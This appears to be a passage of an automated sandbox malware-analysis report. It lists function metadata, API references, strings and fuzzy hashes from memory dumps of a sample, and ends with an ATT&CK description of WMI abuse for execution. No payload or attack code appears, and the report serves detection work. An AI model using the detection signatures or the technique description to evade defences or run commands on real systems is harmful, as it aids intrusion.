Instruction Fuzzy Hash: 8B516E3221474887E6A2EB16E54039F77A4F38DBD4F168215FB8947B96CF38C5A5CB01

Function 000000018000E6D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 000000018000E847
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000E84D

Strings

Erro ao comprimir os dados., xrefs: 000000018000E824

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: Erro ao comprimir os dados.
API String ID: 73155330-1359211096
Opcode ID: cd55a4dddbabb87cb2b10faa848c0fb78fc6f23763516d89d4ffcbbf590dcd37
Instruction ID: 6873e256bc7b8fc2b87366974c85d90f1da0fbab1ffa09ccbe655c91968df2f6
Opcode Fuzzy Hash: cd55a4dddbabb87cb2b10faa848c0fb78fc6f23763516d89d4ffcbbf590dcd37
Instruction Fuzzy Hash: 34416E32204B8882EA96DF65E5503EA7360FB8CBD4F54C525B75D43B95DF78D269C300

Function 00007FFE1A516670 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE1A5167C1
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE1A5167C7

Strings

ios_base::failbit set, xrefs: 00007FFE1A516672

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: ios_base::failbit set
API String ID: 73155330-3924258884
Opcode ID: 9556955be63d47d1b80c6a45b7977861ed42201afed248568aeedab2b1c2cbbb
Instruction ID: 403ee8701a2fdaa900b1c3185e512cbdaa1840b715682c0d7deb1100703f54bb
Opcode Fuzzy Hash: 9556955be63d47d1b80c6a45b7977861ed42201afed248568aeedab2b1c2cbbb
Instruction Fuzzy Hash: 6931B262B0DB8255EE109B13A5003BD6293AB06FE4F584AB6DE6D07BE6DE7CE051C310

Function 000000018001C5F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 000000018001C73A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018001C740

Strings

25-11 C1, xrefs: 000000018001C5F6

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: 25-11 C1
API String ID: 73155330-2243052442
Opcode ID: 579499a58c0f5544978756b4ffd602de36cd6e356f1a18becc6c6e6cf39ec844
Instruction ID: 28d40e1e802f01e1863f5eab928cd7ac61c4eafb6cc3eb63df204bae0309930a
Opcode Fuzzy Hash: 579499a58c0f5544978756b4ffd602de36cd6e356f1a18becc6c6e6cf39ec844
Instruction Fuzzy Hash: E5310732302F8849FF9BDB6695047E922419708FF4F588620AE7907BD5DE78C68A9309

Function 000000018005220C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000000180052323
GetLastError.KERNEL32 ref: 0000000180052345

Strings

U, xrefs: 00000001800522CF

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: cbfb6feb9f908b50f08deb14bf7ef85f14d6fec73a6d22abb683c943f313f388
Instruction ID: 4663b9d976d931aed46b3248241aaa0ff7e5c2796c75b62eec42deb742d293fd
Opcode Fuzzy Hash: cbfb6feb9f908b50f08deb14bf7ef85f14d6fec73a6d22abb683c943f313f388
Instruction Fuzzy Hash: F741BF32214B8882EBA19F25E8443EA67A0F79D7D4F408021FE8D87798DF3DC649C740

Function 00007FFE1A526198 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFE1A5262AF
GetLastError.KERNEL32 ref: 00007FFE1A5262D1

Strings

U, xrefs: 00007FFE1A52625B

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 93fda38647b12dca2d5013087da8c22bbef30cd22cb03198eb809203f1493048
Instruction ID: 1d092926ef0f7704ad3bf08c7f80c904822aa1cee460658e699eea490999a04a
Opcode Fuzzy Hash: 93fda38647b12dca2d5013087da8c22bbef30cd22cb03198eb809203f1493048
Instruction Fuzzy Hash: 18419322B1CA5181DB208F66E4443B9B761FB99BA4F404076EE4D87B68EF3CD441C750

Function 000000018005455C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000001800545E9
_invalid_parameter_noinfo.LIBCMT ref: 0000000180054643

Strings

25-11 C1, xrefs: 000000018005456F

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 25-11 C1
API String ID: 3215553584-2243052442
Opcode ID: 1349bce43a40d19b7c9804b52bbb04357c2a6e6588de5bfd0f2093b8d579589a
Instruction ID: ca1c0cdd6905f79990ad388ec9b13af1c31e575d4ce44335920c2d7937790ccb
Opcode Fuzzy Hash: 1349bce43a40d19b7c9804b52bbb04357c2a6e6588de5bfd0f2093b8d579589a
Instruction Fuzzy Hash: 0031C772204B4846EBA39F11A1403DD6260FB49BE8F55C311BEB82BBD6DE36C65AC701

Function 00007FFE1A512B70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE1A512C1F
__std_exception_copy.LIBVCRUNTIME ref: 00007FFE1A512C58

Strings

ios_base::failbit set, xrefs: 00007FFE1A512B70

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
String ID: ios_base::failbit set
API String ID: 1109970293-3924258884
Opcode ID: 0bd28c98cc759fd2571f13b34d0e65b9689ae30b328330fba902398f1bd5cac5
Instruction ID: 6f2329db039eae276f5e15b6505f9dd59d5194e5ecc47dc11ec85e1151db7bc0
Opcode Fuzzy Hash: 0bd28c98cc759fd2571f13b34d0e65b9689ae30b328330fba902398f1bd5cac5
Instruction Fuzzy Hash: 60218862E1CF8591DA008B25E4411B96361FF99BB8F54A372EAAC027A5EF7CD1D5C700

Function 00000001800551F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_handle_errorf.LIBCMT ref: 0000000180055366

Strings

", xrefs: 0000000180055311
powf, xrefs: 000000018005535F

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _handle_errorf
String ID: "$powf
API String ID: 2315412904-603753351
Opcode ID: 8a6110276f08c84f636a680ad4f501b49974e56e6d2d7b8a40f630f3227460ce
Instruction ID: a107b141abc673b7ecfa35b04e85403dae5c3374e35a8dbd4a33ba8d80abdd50
Opcode Fuzzy Hash: 8a6110276f08c84f636a680ad4f501b49974e56e6d2d7b8a40f630f3227460ce
Instruction Fuzzy Hash: 6C414573914A84DBD3B0CF21E0947EAB7A0F39D389F14230AF78511994DB79C654AB00

Function 00000001800550D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00000001800551E2

Strings

pow, xrefs: 00000001800551D1
", xrefs: 00000001800551BB

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _handle_error
String ID: "$pow
API String ID: 1757819995-713443511
Opcode ID: e171939365bb5d2723310adba92d64812541e4b9fe358a4f28f768e472b61b62
Instruction ID: d49145d1cfce7181a30be185a888ad5400171eebee33653b5f48d41a0d120e06
Opcode Fuzzy Hash: e171939365bb5d2723310adba92d64812541e4b9fe358a4f28f768e472b61b62
Instruction Fuzzy Hash: A7316072918EC886E7B1CF10E4407ABBAA0F7DE385F205306F6C516A54DBBEC6859F04

Function 000000018004E898 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_set_errno_from_matherr.LIBCMT ref: 000000018004E944
_set_errno_from_matherr.LIBCMT ref: 000000018004E958

Strings

exp, xrefs: 000000018004E8BF

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _set_errno_from_matherr
String ID: exp
API String ID: 1187470696-113136155
Opcode ID: 4eb573196c377828c0286db727cf0b5bfe97a9207344c89dba67b2a8d2b8f24f
Instruction ID: 0d4e442f30c8b27a235b3898225ed0083bdd2850509d9c97b4c821a96a883696
Opcode Fuzzy Hash: 4eb573196c377828c0286db727cf0b5bfe97a9207344c89dba67b2a8d2b8f24f
Instruction Fuzzy Hash: 1B214836614B88CBE7A1DF28E48179A73A0F78D744F505525FA8D82795DF3CC6448F04

Function 000000018004F0AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000018004F0E5
CompareStringW.KERNEL32 ref: 000000018004F16D

Strings

CompareStringEx, xrefs: 000000018004F0D9

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CompareStringtry_get_function
String ID: CompareStringEx
API String ID: 3328479835-2590796910
Opcode ID: d6d535b359f5ce4249b6de40f45c6e16099354d2b9d5fbd6690759af51fe77cc
Instruction ID: abd974635cb4a6c55b62d0f5d8b49c2b3ab342e0207cc36916049485633d5163
Opcode Fuzzy Hash: d6d535b359f5ce4249b6de40f45c6e16099354d2b9d5fbd6690759af51fe77cc
Instruction Fuzzy Hash: C7114A36608B8486D7A1CB06F88039AB7A1F7CDBC4F14812AFE8D83B59CF38C5448B44

Function 000000018004F560 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000018004F599
LCMapStringW.KERNEL32 ref: 000000018004F621

Strings

LCMapStringEx, xrefs: 000000018004F58D

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: aae795cf90c326fcbc1cf2aa54e5220c359165d1dd9a60f2656d611ea9abab0d
Instruction ID: f90502aff4c296d2c540f1852a9c20f7a7b56b7e2c958b5ec533a476f5b343fd
Opcode Fuzzy Hash: aae795cf90c326fcbc1cf2aa54e5220c359165d1dd9a60f2656d611ea9abab0d
Instruction Fuzzy Hash: 68113836608BC486D7A0CF06F88039AB7A1F78DBC4F548126EE8D83B19DF38C5548B44

Function 0000000180002E60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000000180002E77
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000000180002EB6

Part of subcall function 000000018003544C: _Yarn.LIBCPMT ref: 000000018003547A

Strings

bad locale name, xrefs: 0000000180002ECA

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
String ID: bad locale name
API String ID: 1838369231-1405518554
Opcode ID: bb6bd2ea4fbc5a9fe751f592014becece786734a209960aca77912fd5a5dd911
Instruction ID: 8f531790d1cfed973b8f3783d1c1f06d959982d33ddfda3d87ea940f7d5368e2
Opcode Fuzzy Hash: bb6bd2ea4fbc5a9fe751f592014becece786734a209960aca77912fd5a5dd911
Instruction Fuzzy Hash: A0016233105B8489C786DF75A88039D77A5F75CBC8F2991299B8C8771AEF34C594C340

Function 00007FFE1A519FF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A51215F), ref: 00007FFE1A51A040
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A51215F), ref: 00007FFE1A51A081

Strings

csm, xrefs: 00007FFE1A51A06E

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0996e183b998a1e9fcfd96ee5988bf64810ccbd9c5a583148ba9e00abd763b39
Instruction ID: a145922d3dde3789ce8bf62f7835dee126cef477e7016b5281f1d9a205197d82
Opcode Fuzzy Hash: 0996e183b998a1e9fcfd96ee5988bf64810ccbd9c5a583148ba9e00abd763b39
Instruction Fuzzy Hash: 41111C36618F4182EB218B26F4402797BE5FB89B94F5842B2DB8C07769DF3DD5518700

Function 000000018003B448 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,0000000180034ED6), ref: 000000018003B48C
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,0000000180034ED6), ref: 000000018003B4D2

Strings

csm, xrefs: 000000018003B4BF

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 854b99de6198ec8f320de08e21c9b84f4c43c1988aced309d7cb7f75fcf9a6b2
Instruction ID: f65b61f3801698f7e2d42944c55b16dd0672c411584952135a06c18c402355b5
Opcode Fuzzy Hash: 854b99de6198ec8f320de08e21c9b84f4c43c1988aced309d7cb7f75fcf9a6b2
Instruction Fuzzy Hash: 2F111C32214B8482EB628F15F84039A77E5F788BD8F698221EF8D47769DF39C655CB00

Function 00007FFE1A5121E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FFE1A5121EB
__std_exception_copy.LIBVCRUNTIME ref: 00007FFE1A512224

Strings

string too long, xrefs: 00007FFE1A5121E4

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Xinvalid_argument__std_exception_copystd::_
String ID: string too long
API String ID: 2536225881-2556327735
Opcode ID: 9a8366e78e6b1f23007a747afd9679aabe0274f3b3fca117b1cddf114eacaf89
Instruction ID: 4b22e43f486825dd9802483d754d109cc68391f05f99d91b03693916c5e21920
Opcode Fuzzy Hash: 9a8366e78e6b1f23007a747afd9679aabe0274f3b3fca117b1cddf114eacaf89
Instruction Fuzzy Hash: CBE03965B18E4490DA019F22E8800B823A1AF6AB24B8881B2DD5D46362EE3CA1E6C300

Function 000000018004F3D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000018004F3F9
GetUserDefaultLCID.KERNEL32(?,?,000000A0,000000018005A02C), ref: 000000018004F410

Strings

GetUserDefaultLocaleName, xrefs: 000000018004F3DC, 000000018004F3E6

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: DefaultUsertry_get_function
String ID: GetUserDefaultLocaleName
API String ID: 3217810228-151340334
Opcode ID: 8fd4c3da99d4179e1998a3f987598bc5519673d8025a638a4618585685857c4d
Instruction ID: a3f25a67a9ecd0b4ed82ef53759437ba1e89646842c772a23f00aaef3a59eabc
Opcode Fuzzy Hash: 8fd4c3da99d4179e1998a3f987598bc5519673d8025a638a4618585685857c4d
Instruction Fuzzy Hash: 5AF08231700A4882FBD65B65B584BFA1252AB8C7C4F65D035B95947B55CE28868D8740

Function 000000018004F434 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000018004F465
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,021213E8,00000001800511B2,?,?,?,00000001800510AA,?,?,00000025,0000000180042A8E), ref: 000000018004F47F

Strings

InitializeCriticalSectionEx, xrefs: 000000018004F459

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: c2b058532fbf7768d56cf23a84c9b097e0a47f8c22af4bb17c0760f4bbb326da
Instruction ID: c16189e4587543054f6c10e74774e5f2dd7682e4abcf7714a648663f874fe82b
Opcode Fuzzy Hash: c2b058532fbf7768d56cf23a84c9b097e0a47f8c22af4bb17c0760f4bbb326da
Instruction Fuzzy Hash: 38F05E36714B9882E6969B41B4403DA6261FB8DBD0F55D125FA6907B54CF38C64DCB40

Function 000000018004F2F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000018004F321
TlsSetValue.KERNEL32(?,?,8000000000000000,000000018004B616,?,?,8000000000000000,0000000180041701,?,?,?,?,000000018004ACE1), ref: 000000018004F338

Strings

FlsSetValue, xrefs: 000000018004F30E

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 1858fd3788c54da4b342e6a3a0fcc706e89c483cc14337906e5fcad6974405e1
Instruction ID: 3b1ecb4029c846009c2ad01e1b97aa95fb3841a82e257ce3c9598af69c61347b
Opcode Fuzzy Hash: 1858fd3788c54da4b342e6a3a0fcc706e89c483cc14337906e5fcad6974405e1
Instruction Fuzzy Hash: E0E09B72201B48D1FB969B54F8443E92262A74C7C4F69C026FA1907394CE3CC78DC710

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
